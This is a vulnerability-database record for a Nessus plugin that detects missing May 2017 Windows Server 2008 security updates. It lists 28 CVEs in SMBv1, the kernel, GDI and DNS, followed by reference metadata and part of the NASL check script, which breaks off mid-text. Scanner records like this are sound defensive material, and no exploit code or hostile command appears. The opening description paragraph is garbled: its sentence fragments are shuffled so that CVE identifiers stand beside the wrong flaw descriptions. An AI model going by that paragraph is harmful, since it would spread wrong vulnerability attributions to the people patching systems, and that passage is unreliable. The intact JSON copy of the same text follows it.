Windows 2008 May 2017 Multiple Security Updates

2017-05-09T00:00:00

Description

The remote Windows host is missing multiple - An elevation of privilege vulnerability exists when the (CVE-2017-0077) - A denial of service vulnerability exists in Windows DNS - An information disclosure vulnerability exists in the (CVE-2017-0190) - An elevation of privilege vulnerability exists in the - An elevation of privilege vulnerability exists in - An information disclosure vulnerability exists in the - An information disclosure vulnerability exists in the - An elevation of privilege vulnerability exists in the An attacker who successfully exploited the vulnerability (CVE-2017-0244) - An information disclosure vulnerability exists when the An attacker who successfully exploited the vulnerability - An elevation of privilege vulnerability exists when (CVE-2017-0246) - An information disclosure vulnerability exists when the (CVE-2017-0258) - An elevation of privilege vulnerability exists in (CVE-2017-0263) - An information disclosure vulnerability exists in the (CVE-2017-0267) - An information disclosure vulnerability exists in the (CVE-2017-0268) - A denial of service vulnerability exists in Microsoft (CVE-2017-0269) - An information disclosure vulnerability exists in the (CVE-2017-0270) - An information disclosure vulnerability exists in the (CVE-2017-0271) - A remote code execution vulnerability exists in the (CVE-2017-0272) - A denial of service vulnerability exists in Microsoft (CVE-2017-0273) - An information disclosure vulnerability exists in the (CVE-2017-0274) - An information disclosure vulnerability exists in the (CVE-2017-0275) - An information disclosure vulnerability exists in the (CVE-2017-0276) - A remote code execution vulnerability exists in the (CVE-2017-0277) - A remote code execution vulnerability exists in the (CVE-2017-0278) - A remote code execution vulnerability exists in the (CVE-2017-0279) - A denial of service vulnerability exists in Microsoft (CVE-2017-0280) - An information disclosure vulnerability exists in the security updates released on 2017/05/09. It is, therefore, affected by multiple vulnerabilities : Windows improperly handles objects in memory. Server if the server is configured to answer version queries. An attacker who successfully exploited this vulnerability could cause the DNS Server service to become nonresponsive. (CVE-2017-0171) way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213) Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214) Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175, CVE-2017-0220) way some ActiveX objects are instantiated. An attacker who successfully exploited this vulnerability could gain access to protected memory contents. (CVE-2017-0242) way that the Windows Kernel handles objects in memory. could execute code with elevated permissions. On systems with Windows 7 for x64-based Systems or later installed, this vulnerability can lead to denial of service. win32k component improperly provides kernel information. could obtain information to further compromise the users system. (CVE-2017-0245) Windows improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. On computers with Windows 7 for x64-based systems or later installed, this vulnerability can lead to denial of service. Windows kernel improperly initializes objects in memory. Windows when the Windows kernel-mode driver fails to properly handle objects in memory. Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding. Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server. Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding. Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server. Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server. Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server. Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding. GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)

{"id": "SMB_NT_MS17_MAY_WIN2008.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Windows 2008 May 2017 Multiple Security Updates", "description": "The remote Windows host is missing multiple security updates released on 2017/05/09. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows improperly handles objects in memory.\n (CVE-2017-0077)\n\n - A denial of service vulnerability exists in Windows DNS Server if the server is configured to answer version queries. An attacker who successfully exploited this vulnerability could cause the DNS Server service to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system.\n (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175, CVE-2017-0220)\n\n - An information disclosure vulnerability exists in the way some ActiveX objects are instantiated. An attacker who successfully exploited this vulnerability could gain access to protected memory contents. (CVE-2017-0242)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions. On systems with Windows 7 for x64-based Systems or later installed, this vulnerability can lead to denial of service.\n (CVE-2017-0244)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-0245)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. On computers with Windows 7 for x64-based systems or later installed, this vulnerability can lead to denial of service.\n (CVE-2017-0246)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n (CVE-2017-0258)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory.\n (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "published": "2017-05-09T00:00:00", "modified": "2022-03-29T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/100063", "reporter": "This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0280", "https://support.microsoft.com/en-us/help/4018466/title", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0175", "https://support.microsoft.com/en-us/help/4019149/title", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0077", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0213", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0242", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0214", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0171", "https://support.microsoft.com/en-us/help/4019204/title", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0279", "https://support.microsoft.com/en-us/help/4018821/title", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0258", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0268", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0269", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0273", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0276", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0272", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0190", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0245", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0271", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0244", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0220", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0275", "https://support.microsoft.com/en-us/help/4018927/title", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0263", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0270", "https://support.microsoft.com/en-us/help/4018885/title", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0278", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0274", "https://support.microsoft.com/en-us/help/4018556/title", "https://support.microsoft.com/en-us/help/4018196/title", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0267", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0246", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8552", "https://support.microsoft.com/en-us/help/4019206/title", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0277"], "cvelist": ["CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0242", "CVE-2017-0244", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"], "immutableFields": [], "lastseen": "2022-06-16T16:22:24", "viewCount": 89, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:6D4430B5-2DD4-4277-B666-3F202D23AD1B", "AKB:FD8F3671-7E1D-4B44-B0A0-D4BBEA6DA814"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0331", "CPAI-2017-0343", "CPAI-2017-0365", "CPAI-2017-0366", "CPAI-2017-0369", "CPAI-2017-0370", "CPAI-2017-0371", "CPAI-2017-0372", "CPAI-2017-0375", "CPAI-2017-0379", "CPAI-2017-0482", "CPAI-2017-0518", "CPAI-2017-0591"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6"]}, {"type": "cve", "idList": ["CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0242", "CVE-2017-0244", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"]}, {"type": "exploitdb", "idList": ["EDB-ID:44478"]}, {"type": "fireeye", "idList": ["FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B", "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85"]}, {"type": "githubexploit", "idList": ["FB99D0AC-3747-583A-AE7D-EE0F4E626D66"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170616-01-WINDOWS"]}, {"type": "ibm", "idList": ["C0CE349C81AF5AC7494E87E330698551BF46584CA331B02039B0B4D82875B334"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}, {"type": "kaspersky", "idList": ["KLA11009", "KLA11040", "KLA11077"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0077", "MS:CVE-2017-0171", "MS:CVE-2017-0175", "MS:CVE-2017-0190", "MS:CVE-2017-0213", "MS:CVE-2017-0214", "MS:CVE-2017-0220", "MS:CVE-2017-0242", "MS:CVE-2017-0244", "MS:CVE-2017-0245", "MS:CVE-2017-0246", "MS:CVE-2017-0258", "MS:CVE-2017-0263", "MS:CVE-2017-0267", "MS:CVE-2017-0268", "MS:CVE-2017-0269", "MS:CVE-2017-0270", "MS:CVE-2017-0271", "MS:CVE-2017-0272", "MS:CVE-2017-0273", "MS:CVE-2017-0274", "MS:CVE-2017-0275", "MS:CVE-2017-0276", "MS:CVE-2017-0277", "MS:CVE-2017-0278", "MS:CVE-2017-0279", "MS:CVE-2017-0280"]}, {"type": "mskb", "idList": ["KB4018196", "KB4018466", "KB4018556", "KB4018821", "KB4018885", "KB4018927", "KB4019149", "KB4019204", "KB4019206", "KB4019213", "KB4019214", "KB4019263", "KB4466388"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786206", "MYHACK58:62201786826"]}, {"type": "nessus", "idList": ["MS17_MAY_SMBV1.NASL", "SMB_NT_MS17-MAY_4019214.NASL", "SMB_NT_MS17_JUNE_XP_2003.NASL", "SMB_NT_MS17_JUN_4025685_VISTA.NASL", "SMB_NT_MS17_JUN_WINDOWS8.NASL", "SMB_NT_MS17_MAY_4016871.NASL", "SMB_NT_MS17_MAY_4019215.NASL", "SMB_NT_MS17_MAY_4019264.NASL", "SMB_NT_MS17_MAY_4019472.NASL", "SMB_NT_MS17_MAY_4019473.NASL", "SMB_NT_MS17_MAY_4019474.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108777", "OPENVAS:1361412562310811027", "OPENVAS:1361412562310811028", "OPENVAS:1361412562310811029", "OPENVAS:1361412562310811030", "OPENVAS:1361412562310811031", "OPENVAS:1361412562310811107", "OPENVAS:1361412562310811108", "OPENVAS:1361412562310811110", "OPENVAS:1361412562310811111", "OPENVAS:1361412562310811112", "OPENVAS:1361412562310811113", "OPENVAS:1361412562310811114", "OPENVAS:1361412562310811115", "OPENVAS:1361412562310811117", "OPENVAS:1361412562310811118", "OPENVAS:1361412562310811119", "OPENVAS:1361412562310811208", "OPENVAS:1361412562310811209"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:5BAC820D9FD19A73AC8985AAC539E0DE"]}, {"type": "ptsecurity", "idList": ["PT-2017-13"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:2AFF0D4E01534CA4823F85B912170FD0", "QUALYSBLOG:E752DE2F12FECA2E217194D510424325"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:70FFE7CD88D4CCE4994B4B417E2B4960", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "securelist", "idList": ["SECURELIST:75F0B75D28318C525992E42495D8C5EE", "SECURELIST:A40E939E20C451592F5ED01B134552A7", "SECURELIST:F845B38B54D0C8C027B3C2728E64B367"]}, {"type": "seebug", "idList": ["SSV:93116", "SSV:96267"]}, {"type": "symantec", "idList": ["SMNTC-98097", "SMNTC-98102", "SMNTC-98103", "SMNTC-98108", "SMNTC-98109", "SMNTC-98110", "SMNTC-98111", "SMNTC-98112", "SMNTC-98114", "SMNTC-98115", "SMNTC-98258", "SMNTC-98259", "SMNTC-98260", "SMNTC-98261", "SMNTC-98263", "SMNTC-98264", "SMNTC-98265", "SMNTC-98266", "SMNTC-98267", "SMNTC-98268", "SMNTC-98270", "SMNTC-98271", "SMNTC-98272", "SMNTC-98273", "SMNTC-98274", "SMNTC-98275", "SMNTC-98298"]}, {"type": "thn", "idList": ["THN:35CDED923C2A70050CA53879EA860398"]}, {"type": "threatpost", "idList": ["THREATPOST:2086A75F024930F586197B1CF4B4B91A", "THREATPOST:22AA852BEEA43B18D4341D7ADA922536", "THREATPOST:3649750E149C0B00551806E47C047B39", "THREATPOST:D75255A60A5F03024D8AEF37C1FD4993", "THREATPOST:FC2B25371317ED019A81553465477089"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:278CA36BE7BE1D87941A99D03E2C3D5B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27774", "1337DAY-ID-27775", "1337DAY-ID-27776", "1337DAY-ID-27797", "1337DAY-ID-27798", "1337DAY-ID-30198"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:FD8F3671-7E1D-4B44-B0A0-D4BBEA6DA814"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0331", "CPAI-2017-0343", "CPAI-2017-0365", "CPAI-2017-0366", "CPAI-2017-0369", "CPAI-2017-0370", "CPAI-2017-0371", "CPAI-2017-0372", "CPAI-2017-0375", "CPAI-2017-0379", "CPAI-2017-0482", "CPAI-2017-0518", "CPAI-2017-0591"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6"]}, {"type": "cve", "idList": ["CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0242", "CVE-2017-0244", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"]}, {"type": "exploitdb", "idList": ["EDB-ID:44478"]}, {"type": "fireeye", "idList": ["FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B"]}, {"type": "githubexploit", "idList": ["FB99D0AC-3747-583A-AE7D-EE0F4E626D66"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170616-01-WINDOWS"]}, {"type": "ibm", "idList": ["C0CE349C81AF5AC7494E87E330698551BF46584CA331B02039B0B4D82875B334"]}, {"type": "kaspersky", "idList": ["KLA11009", "KLA11040"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0280"]}, {"type": "mskb", "idList": ["KB4019206"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786826"]}, {"type": "nessus", "idList": ["MS17_MAY_SMBV1.NASL", "SMB_HOTFIXES.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108777", "OPENVAS:1361412562310811027", "OPENVAS:1361412562310811028", "OPENVAS:1361412562310811029", "OPENVAS:1361412562310811030", "OPENVAS:1361412562310811031", "OPENVAS:1361412562310811107", "OPENVAS:1361412562310811108", "OPENVAS:1361412562310811110", "OPENVAS:1361412562310811111", "OPENVAS:1361412562310811112", "OPENVAS:1361412562310811113", "OPENVAS:1361412562310811114", "OPENVAS:1361412562310811115", "OPENVAS:1361412562310811117", "OPENVAS:1361412562310811118", "OPENVAS:1361412562310811119", "OPENVAS:1361412562310811208", "OPENVAS:1361412562310811209"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:5BAC820D9FD19A73AC8985AAC539E0DE"]}, {"type": "ptsecurity", "idList": ["PT-2017-13"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:2AFF0D4E01534CA4823F85B912170FD0", "QUALYSBLOG:E752DE2F12FECA2E217194D510424325"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:70FFE7CD88D4CCE4994B4B417E2B4960", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "securelist", "idList": ["SECURELIST:A40E939E20C451592F5ED01B134552A7", "SECURELIST:F845B38B54D0C8C027B3C2728E64B367"]}, {"type": "seebug", "idList": ["SSV:93116"]}, {"type": "symantec", "idList": ["SMNTC-98097", "SMNTC-98108"]}, {"type": "thn", "idList": ["THN:35CDED923C2A70050CA53879EA860398"]}, {"type": "threatpost", "idList": ["THREATPOST:2086A75F024930F586197B1CF4B4B91A", "THREATPOST:D75255A60A5F03024D8AEF37C1FD4993", "THREATPOST:FC2B25371317ED019A81553465477089"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:278CA36BE7BE1D87941A99D03E2C3D5B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27774", "1337DAY-ID-27775", "1337DAY-ID-27797", "1337DAY-ID-27798"]}]}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1659980328, "score": 1659980468}, "_internal": {"score_hash": "ef3e0c40ab7c4fd7f5deb1389db2fd7f"}, "pluginID": "100063", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100063);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0175\",\n \"CVE-2017-0190\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0242\",\n \"CVE-2017-0244\",\n \"CVE-2017-0245\",\n \"CVE-2017-0246\",\n \"CVE-2017-0258\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98108,\n 98109,\n 98110,\n 98111,\n 98112,\n 98114,\n 98115,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98275,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4018196\");\n script_xref(name:\"MSKB\", value:\"4018466\");\n script_xref(name:\"MSKB\", value:\"4018556\");\n script_xref(name:\"MSKB\", value:\"4018821\");\n script_xref(name:\"MSKB\", value:\"4018885\");\n script_xref(name:\"MSKB\", value:\"4018927\");\n script_xref(name:\"MSKB\", value:\"4019149\");\n script_xref(name:\"MSKB\", value:\"4019204\");\n script_xref(name:\"MSKB\", value:\"4019206\");\n script_xref(name:\"MSFT\", value:\"MS17-4018196\");\n script_xref(name:\"MSFT\", value:\"MS17-4018466\");\n script_xref(name:\"MSFT\", value:\"MS17-4018556\");\n script_xref(name:\"MSFT\", value:\"MS17-4018821\");\n script_xref(name:\"MSFT\", value:\"MS17-4018885\");\n script_xref(name:\"MSFT\", value:\"MS17-4018927\");\n script_xref(name:\"MSFT\", value:\"MS17-4019149\");\n script_xref(name:\"MSFT\", value:\"MS17-4019204\");\n script_xref(name:\"MSFT\", value:\"MS17-4019206\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 2008 May 2017 Multiple Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/05/09. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows improperly handles objects in memory.\n (CVE-2017-0077)\n\n - A denial of service vulnerability exists in Windows DNS\n Server if the server is configured to answer version\n queries. An attacker who successfully exploited this\n vulnerability could cause the DNS Server service to\n become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system.\n (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0175, CVE-2017-0220)\n\n - An information disclosure vulnerability exists in the\n way some ActiveX objects are instantiated. An attacker\n who successfully exploited this vulnerability could gain\n access to protected memory contents. (CVE-2017-0242)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions. On systems\n with Windows 7 for x64-based Systems or later installed,\n this vulnerability can lead to denial of service.\n (CVE-2017-0244)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-0245)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. On computers\n with Windows 7 for x64-based systems or later installed,\n this vulnerability can lead to denial of service.\n (CVE-2017-0246)\n\n - An information disclosure 